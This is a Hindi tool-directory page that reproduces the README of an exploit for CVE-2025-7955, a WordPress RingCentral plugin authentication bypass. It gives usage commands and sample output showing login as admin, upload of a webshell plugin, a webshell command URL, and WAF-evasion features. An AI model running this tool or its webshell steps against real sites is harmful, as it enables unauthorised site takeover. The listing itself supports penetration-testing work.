Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-7955 — RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify फ़ंक्शन के माध्यम से सर्वर-साइड सत्यापन के अभाव से प्रमाणीकरण बायपास | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-7955
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंग
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify फ़ंक्शन के माध्यम से सर्वर-साइड सत्यापन के अभाव से प्रमाणीकरण बायपास

111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - सर्वर-साइड सत्यापन की कमी के कारण ringcentral_admin_login_2fa_verify फ़ंक्शन के माध्यम से प्रमाणीकरण बाईपास

🚨 CVE-2025-7955 | RingCentral Communications WordPress एक्सप्लॉइट


📝 भेद्यता अवलोकन

CVE: CVE-2025-7955
प्रभावित प्लगइन: RingCentral Communications (WordPress)
प्रभावित संस्करण: 1.5 – 1.6.8
CVSS स्कोर: 9.8 (गंभीर)
प्रकार: प्रमाणीकरण बाईपास (सर्वर-साइड सत्यापन की कमी)

_WordPress के लिए RingCentral Communications प्लगइन ringcentral_admin_login_2fa_verify() फ़ंक्शन के भीतर अनुचित सत्यापन के कारण प्रमाणीकरण बाईपास की भेद्यता से ग्रस्त है। संस्करण 1.5 से 1.6.8 तक अनधिकृत हमलावरों को केवल समान फर्जी कोड प्रदान करके किसी भी उपयोगकर्ता के रूप में लॉग इन करने की अनुमति देते हैं।**


⚡ स्क्रिप्ट कार्यक्षमता

यह एक्सप्लॉइट CVE-2025-7955 के लिए संपूर्ण हमले की श्रृंखला को स्वचालित करता है। इसे निम्न के लिए डिज़ाइन किया गया है:

  • प्रमाणीकरण बाईपास: यह स्क्रिप्ट पासवर्ड की आवश्यकता के बिना किसी भी उपयोगकर्ता (आमतौर पर एडमिन) के रूप में WordPress में लॉग इन करती है, और कमजोर 2FA एंडपॉइंट का शोषण करती है।
  • उपयोगकर्ता नामों की स्वचालित खोज: यदि उपयोगकर्ता नाम प्रदान नहीं किया गया है, तो स्क्रिप्ट WordPress REST API (/wp-json/wp/v2/users/ID) के माध्यम से इसे सूचीबद्ध करने का प्रयास करेगी।
  • आवश्यक टोकन निकालना: प्लगइन अपलोड के लिए आवश्यक CSRF सुरक्षा nonce को स्वचालित रूप से प्राप्त करती है।
  • दुर्भावनापूर्ण प्लगइन (webshell) अपलोड करना: एक बार प्रमाणित होने के बाद, स्क्रिप्ट PHP webshell युक्त एक ZIP प्लगइन अपलोड करती है।
  • webshell के माध्यम से कमांड निष्पादन: सफल अपलोड के बाद, स्क्रिप्ट शेल के माध्यम से whoami चलाकर कोड निष्पादन प्रदर्शित करती है और आउटपुट प्रिंट करती है।
  • स्टील्थ और बचाव सुविधाएँ: सरल सुरक्षाओं को बायपास करने के लिए रैंडम देरी, घूमने वाली User-Agent सूची, और बुनियादी WAF/captcha पहचान का उपयोग करती है।

🚀 उपयोग

  1. अपना दुर्भावनापूर्ण प्लगइन तैयार करें
    सुनिश्चित करें कि आपकी दुर्भावनापूर्ण प्लगइन ZIP फ़ाइल (डिफ़ॉल्ट: Nxploit.zip) स्क्रिप्ट के समान निर्देशिका में है।

  2. एक्सप्लॉइट चलाएँ:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (आवश्यक) लक्षित WordPress साइट URL
    • -user, --username : (वैकल्पिक) जिस उपयोगकर्ता के रूप में लॉग इन करना है (छोड़ने पर स्वचालित रूप से खोजा जाता है)
    • -id, --id_admin : (डिफ़ॉल्ट: 1) उपयोगकर्ता ID (एडमिन आमतौर पर ID 1 होता है)
    • -z, --zip : (डिफ़ॉल्ट: Nxploit.zip) दुर्भावनापूर्ण प्लगइन ZIP का पथ
  3. उदाहरण:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

✅ अपेक्षित सफल आउटपुट

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 मुख्य विशेषताएँ

  • कोई पासवर्ड आवश्यक नहीं: प्रमाणीकरण को पूरी तरह से बायपास करने के लिए एक तार्किक त्रुटि का शोषण करता है।
  • स्वचालित enumeration: सार्वजनिक API के माध्यम से उपयोगकर्ता नाम और ID निकाल सकता है।
  • हैंड्स-फ्री शोषण: लॉगिन से लेकर webshell अपलोड और कमांड निष्पादन तक, सभी चरण स्वचालित हैं।
  • बुनियादी बायपास: रैंडम देरी, हेडर स्पूफिंग, और बुनियादी सुरक्षा पहचान।
  • मॉड्यूलर: आवश्यकतानुसार प्लगइन पेलोड को आसानी से संशोधित करें या सुविधाएँ जोड़ें।

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए है।
उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए लेखक कोई जिम्मेदारी नहीं लेता है।


द्वारा: Khaled Alenazi (Nxploited)

टूल डाउनलोड करें

या उपयोगकर्ता नाम/ID निर्दिष्ट करें:

root@kitploit:~
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1